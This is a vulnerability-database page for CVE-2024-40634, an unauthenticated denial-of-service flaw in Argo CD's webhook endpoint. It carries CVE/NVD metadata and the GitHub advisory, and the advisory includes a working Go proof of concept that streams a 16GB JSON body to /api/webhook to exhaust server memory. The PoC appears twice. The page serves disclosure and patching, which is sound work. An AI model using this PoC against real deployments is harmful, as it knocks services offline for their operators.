Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2024-40634 (GCVE-0-2024-40634)
Vulnerability from cvelistv5 – Published: 2024-07-22 17:22 – Updated: 2024-08-02 04:33- CWE-400 - Uncontrolled Resource Consumption
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:argoproj:argo-cd:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "argo-cd",
"vendor": "argoproj",
"versions": [
{
"lessThan": "2.9.20",
"status": "affected",
"version": "1.0.0",
"versionType": "custom"
},
{
"lessThan": "2.10.15",
"status": "affected",
"version": "2.10.0",
"versionType": "custom"
},
{
"lessThan": "2.11.6",
"status": "affected",
"version": "2.11.0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-40634",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-23T13:12:57.451737Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-23T13:19:36.934Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:33:11.910Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w"
},
{
"name": "https://github.com/argoproj/argo-cd/commit/46c0c0b64deaab1ece70cb701030b76668ad0cdc",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/argoproj/argo-cd/commit/46c0c0b64deaab1ece70cb701030b76668ad0cdc"
},
{
"name": "https://github.com/argoproj/argo-cd/commit/540e3a57b90eb3655db54793332fac86bcc38b36",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/argoproj/argo-cd/commit/540e3a57b90eb3655db54793332fac86bcc38b36"
},
{
"name": "https://github.com/argoproj/argo-cd/commit/d881ee78949e23160a0b280bb159e4d3d625a4df",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/argoproj/argo-cd/commit/d881ee78949e23160a0b280bb159e4d3d625a4df"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "argo-cd",
"vendor": "argoproj",
"versions": [
{
"status": "affected",
"version": "\u003e= 1.0.0, \u003c 2.9.20"
},
{
"status": "affected",
"version": "\u003e= 2.10.0, \u003c 2.10.15"
},
{
"status": "affected",
"version": "\u003e= 2.11.0, \u003c 2.11.6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. This report details a security vulnerability in Argo CD, where an unauthenticated attacker can send a specially crafted large JSON payload to the /api/webhook endpoint, causing excessive memory allocation that leads to service disruption by triggering an Out Of Memory (OOM) kill. The issue poses a high risk to the availability of Argo CD deployments. This vulnerability is fixed in 2.11.6, 2.10.15, and 2.9.20.\n"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-400",
"description": "CWE-400: Uncontrolled Resource Consumption",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-07-22T17:22:55.732Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w"
},
{
"name": "https://github.com/argoproj/argo-cd/commit/46c0c0b64deaab1ece70cb701030b76668ad0cdc",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/argoproj/argo-cd/commit/46c0c0b64deaab1ece70cb701030b76668ad0cdc"
},
{
"name": "https://github.com/argoproj/argo-cd/commit/540e3a57b90eb3655db54793332fac86bcc38b36",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/argoproj/argo-cd/commit/540e3a57b90eb3655db54793332fac86bcc38b36"
},
{
"name": "https://github.com/argoproj/argo-cd/commit/d881ee78949e23160a0b280bb159e4d3d625a4df",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/argoproj/argo-cd/commit/d881ee78949e23160a0b280bb159e4d3d625a4df"
}
],
"source": {
"advisory": "GHSA-jmvp-698c-4x3w",
"discovery": "UNKNOWN"
},
"title": "Argo CD Unauthenticated Denial of Service (DoS) Vulnerability via /api/webhook Endpoint"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-40634",
"datePublished": "2024-07-22T17:22:55.732Z",
"dateReserved": "2024-07-08T16:13:15.511Z",
"dateUpdated": "2024-08-02T04:33:11.910Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2024-40634",
"date": "2026-04-16",
"epss": "0.02608",
"percentile": "0.85656"
},
"fkie_nvd": {
"configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*\", \"versionStartIncluding\": \"1.0.0\", \"versionEndExcluding\": \"2.9.20\", \"matchCriteriaId\": \"1C70E0BA-D4D0-4C05-A0F1-95E13A68BFDB\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*\", \"versionStartIncluding\": \"2.10.0\", \"versionEndExcluding\": \"2.10.15\", \"matchCriteriaId\": \"E18329BB-8F90-4E14-A20B-FF47D16B2D7D\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*\", \"versionStartIncluding\": \"2.11.0\", \"versionEndExcluding\": \"2.11.6\", \"matchCriteriaId\": \"3E953865-3609-4D15-BD82-8A57A3E2EAB5\"}]}]}]",
"descriptions": "[{\"lang\": \"en\", \"value\": \"Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. This report details a security vulnerability in Argo CD, where an unauthenticated attacker can send a specially crafted large JSON payload to the /api/webhook endpoint, causing excessive memory allocation that leads to service disruption by triggering an Out Of Memory (OOM) kill. The issue poses a high risk to the availability of Argo CD deployments. This vulnerability is fixed in 2.11.6, 2.10.15, and 2.9.20.\\n\"}, {\"lang\": \"es\", \"value\": \"Argo CD es una herramienta declarativa de entrega continua de GitOps para Kubernetes. Este informe detalla una vulnerabilidad de seguridad en Argo CD, donde un atacante no autenticado puede enviar un gran payload JSON especialmente manipulado al endpoint /api/webhook, lo que provoca una asignaci\\u00f3n excesiva de memoria que conduce a la interrupci\\u00f3n del servicio al desencadenar un Out Of Memory (OOM) kill. El problema plantea un alto riesgo para la disponibilidad de las implementaciones de Argo CD. Esta vulnerabilidad se solucion\\u00f3 en 2.11.6, 2.10.15 y 2.9.20.\"}]",
"id": "CVE-2024-40634",
"lastModified": "2025-01-09T16:55:20.183",
"metrics": "{\"cvssMetricV31\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"baseScore\": 7.5, \"baseSeverity\": \"HIGH\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"NONE\", \"integrityImpact\": \"NONE\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 3.6}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"baseScore\": 7.5, \"baseSeverity\": \"HIGH\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"NONE\", \"integrityImpact\": \"NONE\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 3.6}]}",
"published": "2024-07-22T18:15:03.770",
"references": "[{\"url\": \"https://github.com/argoproj/argo-cd/commit/46c0c0b64deaab1ece70cb701030b76668ad0cdc\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/argoproj/argo-cd/commit/540e3a57b90eb3655db54793332fac86bcc38b36\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/argoproj/argo-cd/commit/d881ee78949e23160a0b280bb159e4d3d625a4df\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Exploit\", \"Vendor Advisory\"]}, {\"url\": \"https://github.com/argoproj/argo-cd/commit/46c0c0b64deaab1ece70cb701030b76668ad0cdc\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/argoproj/argo-cd/commit/540e3a57b90eb3655db54793332fac86bcc38b36\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/argoproj/argo-cd/commit/d881ee78949e23160a0b280bb159e4d3d625a4df\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Vendor Advisory\"]}]",
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": "[{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-400\"}]}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"NVD-CWE-noinfo\"}]}]"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2024-40634\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-07-22T18:15:03.770\",\"lastModified\":\"2025-01-09T16:55:20.183\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. This report details a security vulnerability in Argo CD, where an unauthenticated attacker can send a specially crafted large JSON payload to the /api/webhook endpoint, causing excessive memory allocation that leads to service disruption by triggering an Out Of Memory (OOM) kill. The issue poses a high risk to the availability of Argo CD deployments. This vulnerability is fixed in 2.11.6, 2.10.15, and 2.9.20.\\n\"},{\"lang\":\"es\",\"value\":\"Argo CD es una herramienta declarativa de entrega continua de GitOps para Kubernetes. Este informe detalla una vulnerabilidad de seguridad en Argo CD, donde un atacante no autenticado puede enviar un gran payload JSON especialmente manipulado al endpoint /api/webhook, lo que provoca una asignaci\u00f3n excesiva de memoria que conduce a la interrupci\u00f3n del servicio al desencadenar un Out Of Memory (OOM) kill. El problema plantea un alto riesgo para la disponibilidad de las implementaciones de Argo CD. Esta vulnerabilidad se solucion\u00f3 en 2.11.6, 2.10.15 y 2.9.20.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-400\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"NVD-CWE-noinfo\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"1.0.0\",\"versionEndExcluding\":\"2.9.20\",\"matchCriteriaId\":\"1C70E0BA-D4D0-4C05-A0F1-95E13A68BFDB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"2.10.0\",\"versionEndExcluding\":\"2.10.15\",\"matchCriteriaId\":\"E18329BB-8F90-4E14-A20B-FF47D16B2D7D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"2.11.0\",\"versionEndExcluding\":\"2.11.6\",\"matchCriteriaId\":\"3E953865-3609-4D15-BD82-8A57A3E2EAB5\"}]}]}],\"references\":[{\"url\":\"https://github.com/argoproj/argo-cd/commit/46c0c0b64deaab1ece70cb701030b76668ad0cdc\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/argoproj/argo-cd/commit/540e3a57b90eb3655db54793332fac86bcc38b36\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/argoproj/argo-cd/commit/d881ee78949e23160a0b280bb159e4d3d625a4df\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/argoproj/argo-cd/commit/46c0c0b64deaab1ece70cb701030b76668ad0cdc\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/argoproj/argo-cd/commit/540e3a57b90eb3655db54793332fac86bcc38b36\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/argoproj/argo-cd/commit/d881ee78949e23160a0b280bb159e4d3d625a4df\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-40634\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-07-23T13:12:57.451737Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:argoproj:argo-cd:*:*:*:*:*:*:*:*\"], \"vendor\": \"argoproj\", \"product\": \"argo-cd\", \"versions\": [{\"status\": \"affected\", \"version\": \"1.0.0\", \"lessThan\": \"2.9.20\", \"versionType\": \"custom\"}, {\"status\": \"affected\", \"version\": \"2.10.0\", \"lessThan\": \"2.10.15\", \"versionType\": \"custom\"}, {\"status\": \"affected\", \"version\": \"2.11.0\", \"lessThan\": \"2.11.6\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-07-23T13:15:22.204Z\"}}], \"cna\": {\"title\": \"Argo CD Unauthenticated Denial of Service (DoS) Vulnerability via /api/webhook Endpoint\", \"source\": {\"advisory\": \"GHSA-jmvp-698c-4x3w\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"argoproj\", \"product\": \"argo-cd\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 1.0.0, \u003c 2.9.20\"}, {\"status\": \"affected\", \"version\": \"\u003e= 2.10.0, \u003c 2.10.15\"}, {\"status\": \"affected\", \"version\": \"\u003e= 2.11.0, \u003c 2.11.6\"}]}], \"references\": [{\"url\": \"https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w\", \"name\": \"https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/argoproj/argo-cd/commit/46c0c0b64deaab1ece70cb701030b76668ad0cdc\", \"name\": \"https://github.com/argoproj/argo-cd/commit/46c0c0b64deaab1ece70cb701030b76668ad0cdc\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/argoproj/argo-cd/commit/540e3a57b90eb3655db54793332fac86bcc38b36\", \"name\": \"https://github.com/argoproj/argo-cd/commit/540e3a57b90eb3655db54793332fac86bcc38b36\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/argoproj/argo-cd/commit/d881ee78949e23160a0b280bb159e4d3d625a4df\", \"name\": \"https://github.com/argoproj/argo-cd/commit/d881ee78949e23160a0b280bb159e4d3d625a4df\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. This report details a security vulnerability in Argo CD, where an unauthenticated attacker can send a specially crafted large JSON payload to the /api/webhook endpoint, causing excessive memory allocation that leads to service disruption by triggering an Out Of Memory (OOM) kill. The issue poses a high risk to the availability of Argo CD deployments. This vulnerability is fixed in 2.11.6, 2.10.15, and 2.9.20.\\n\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-400\", \"description\": \"CWE-400: Uncontrolled Resource Consumption\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-07-22T17:22:55.732Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2024-40634\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-07-23T13:19:36.934Z\", \"dateReserved\": \"2024-07-08T16:13:15.511Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2024-07-22T17:22:55.732Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
GHSA-JMVP-698C-4X3W
Vulnerability from github – Published: 2024-07-22 17:20 – Updated: 2024-08-07 14:17Summary
This report details a security vulnerability in Argo CD, where an unauthenticated attacker can send a specially crafted large JSON payload to the /api/webhook endpoint, causing excessive memory allocation that leads to service disruption by triggering an Out Of Memory (OOM) kill. The issue poses a high risk to the availability of Argo CD deployments.
Details
The webhook server always listens to requests. By default, the endpoint doesn't require authentication. It's possible to send a large, malicious request with headers (in this case "X-GitHub-Event: push") that will make ArgoCD start allocating memory to parse the incoming request. Since the request can be constructed client-side without allocating large amounts of memory, it can be arbitrarily large. Eventually, the argocd-server component will get OOMKilled as it consumes all its available memory.
The fix would be to enforce a limit on the size of the request being parsed.
PoC
Port-forward to the argocd-server service, like so:
kubectl port-forward svc/argocd-server -n argocd 8080:443
Run the below code:
package main
import (
"crypto/tls"
"io"
"net/http"
)
// Define a custom io.Reader that generates a large dummy JSON payload.
type DummyJSONReader struct {
size int64 // Total size to generate
read int64 // Bytes already generated
}
// Read generates the next chunk of the dummy JSON payload.
func (r *DummyJSONReader) Read(p []byte) (n int, err error) {
if r.read >= r.size {
return 0, io.EOF // Finished generating
}
start := false
if r.read == 0 {
// Start of JSON
p[0] = '{'
p[1] = '"'
p[2] = 'd'
p[3] = 'a'
p[4] = 't'
p[5] = 'a'
p[6] = '"'
p[7] = ':'
p[8] = '"'
n = 9
start = true
}
for i := n; i < len(p); i++ {
if r.read+int64(i)-int64(n)+1 == r.size-1 {
// End of JSON
p[i] = '"'
p[i+1] = '}'
r.read += int64(i) + 2 - int64(n)
return i + 2 - n, nil
} else {
p[i] = 'x' // Dummy data
}
}
r.read += int64(len(p)) - int64(n)
if start {
return len(p), nil
}
return len(p) - n, nil
}
func main() {
// Initialize the custom reader with the desired size (16GB in this case).
payloadSize := int64(16) * 1024 * 1024 * 1024 // 16GB
reader := &DummyJSONReader{size: payloadSize}
// HTTP client setup
httpClient := &http.Client{
Timeout: 0, // No timeout
Transport: &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
},
}
req, err := http.NewRequest("POST", "https://localhost:8080/api/webhook", reader)
if err != nil {
panic(err)
}
// Set headers
req.Header.Set("Content-Type", "application/json")
req.Header.Set("X-GitHub-Event", "push")
resp, err := httpClient.Do(req)
if err != nil {
panic(err)
}
defer resp.Body.Close()
println("Response status code:", resp.StatusCode)
}
Patches
A patch for this vulnerability has been released in the following Argo CD versions:
v2.11.6 v2.10.15 v2.9.20
For more information
If you have any questions or comments about this advisory:
Open an issue in the Argo CD issue tracker or discussions Join us on Slack in channel #argo-cd
Credits
This vulnerability was found & reported by Jakub Ciolek
The Argo team would like to thank these contributors for their responsible disclosure and constructive communications during the resolve of this issue
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"last_affected": "1.8.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.9.20"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v2"
},
"ranges": [
{
"events": [
{
"introduced": "2.10.0"
},
{
"fixed": "2.10.15"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v2"
},
"ranges": [
{
"events": [
{
"introduced": "2.11.0"
},
{
"fixed": "2.11.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-40634"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2024-07-22T17:20:02Z",
"nvd_published_at": "2024-07-22T18:15:03Z",
"severity": "HIGH"
},
"details": "### Summary\nThis report details a security vulnerability in Argo CD, where an unauthenticated attacker can send a specially crafted large JSON payload to the /api/webhook endpoint, causing excessive memory allocation that leads to service disruption by triggering an Out Of Memory (OOM) kill. The issue poses a high risk to the availability of Argo CD deployments.\n\n### Details\nThe webhook server always listens to requests. By default, the endpoint doesn\u0027t require authentication. It\u0027s possible to send a large, malicious request with headers (in this case \"X-GitHub-Event: push\") that will make ArgoCD start allocating memory to parse the incoming request. Since the request can be constructed client-side without allocating large amounts of memory, it can be arbitrarily large. Eventually, the argocd-server component will get OOMKilled as it consumes all its available memory.\n\nThe fix would be to enforce a limit on the size of the request being parsed.\n\n### PoC\nPort-forward to the argocd-server service, like so:\n\n```console\nkubectl port-forward svc/argocd-server -n argocd 8080:443\n```\n\nRun the below code:\n\n```go\npackage main\n\nimport (\n\t\"crypto/tls\"\n\t\"io\"\n\t\"net/http\"\n)\n\n// Define a custom io.Reader that generates a large dummy JSON payload.\ntype DummyJSONReader struct {\n\tsize int64 // Total size to generate\n\tread int64 // Bytes already generated\n}\n\n// Read generates the next chunk of the dummy JSON payload.\nfunc (r *DummyJSONReader) Read(p []byte) (n int, err error) {\n\tif r.read \u003e= r.size {\n\t\treturn 0, io.EOF // Finished generating\n\t}\n\n\tstart := false\n\tif r.read == 0 {\n\t\t// Start of JSON\n\t\tp[0] = \u0027{\u0027\n\t\tp[1] = \u0027\"\u0027\n\t\tp[2] = \u0027d\u0027\n\t\tp[3] = \u0027a\u0027\n\t\tp[4] = \u0027t\u0027\n\t\tp[5] = \u0027a\u0027\n\t\tp[6] = \u0027\"\u0027\n\t\tp[7] = \u0027:\u0027\n\t\tp[8] = \u0027\"\u0027\n\t\tn = 9\n\t\tstart = true\n\t}\n\n\tfor i := n; i \u003c len(p); i++ {\n\t\tif r.read+int64(i)-int64(n)+1 == r.size-1 {\n\t\t\t// End of JSON\n\t\t\tp[i] = \u0027\"\u0027\n\t\t\tp[i+1] = \u0027}\u0027\n\t\t\tr.read += int64(i) + 2 - int64(n)\n\t\t\treturn i + 2 - n, nil\n\t\t} else {\n\t\t\tp[i] = \u0027x\u0027 // Dummy data\n\t\t}\n\t}\n\n\tr.read += int64(len(p)) - int64(n)\n\tif start {\n\t\treturn len(p), nil\n\t}\n\treturn len(p) - n, nil\n}\n\nfunc main() {\n\t// Initialize the custom reader with the desired size (16GB in this case).\n\tpayloadSize := int64(16) * 1024 * 1024 * 1024 // 16GB\n\treader := \u0026DummyJSONReader{size: payloadSize}\n\n\t// HTTP client setup\n\thttpClient := \u0026http.Client{\n\t\tTimeout: 0, // No timeout\n\t\tTransport: \u0026http.Transport{\n\t\t\tTLSClientConfig: \u0026tls.Config{InsecureSkipVerify: true},\n\t\t},\n\t}\n\n\treq, err := http.NewRequest(\"POST\", \"https://localhost:8080/api/webhook\", reader)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\t// Set headers\n\treq.Header.Set(\"Content-Type\", \"application/json\")\n\treq.Header.Set(\"X-GitHub-Event\", \"push\")\n\n\tresp, err := httpClient.Do(req)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer resp.Body.Close()\n\n\tprintln(\"Response status code:\", resp.StatusCode)\n}\n```\n\n### Patches\nA patch for this vulnerability has been released in the following Argo CD versions:\n\nv2.11.6\nv2.10.15\nv2.9.20\n\n### For more information\nIf you have any questions or comments about this advisory:\n\nOpen an issue in [the Argo CD issue tracker](https://github.com/argoproj/argo-cd/issues) or [discussions](https://github.com/argoproj/argo-cd/discussions)\nJoin us on [Slack](https://argoproj.github.io/community/join-slack) in channel #argo-cd\n\n### Credits\nThis vulnerability was found \u0026 reported by Jakub Ciolek\n\nThe Argo team would like to thank these contributors for their responsible disclosure and constructive communications during the resolve of this issue\n",
"id": "GHSA-jmvp-698c-4x3w",
"modified": "2024-08-07T14:17:41Z",
"published": "2024-07-22T17:20:02Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-40634"
},
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-cd/commit/46c0c0b64deaab1ece70cb701030b76668ad0cdc"
},
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-cd/commit/540e3a57b90eb3655db54793332fac86bcc38b36"
},
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-cd/commit/d881ee78949e23160a0b280bb159e4d3d625a4df"
},
{
"type": "PACKAGE",
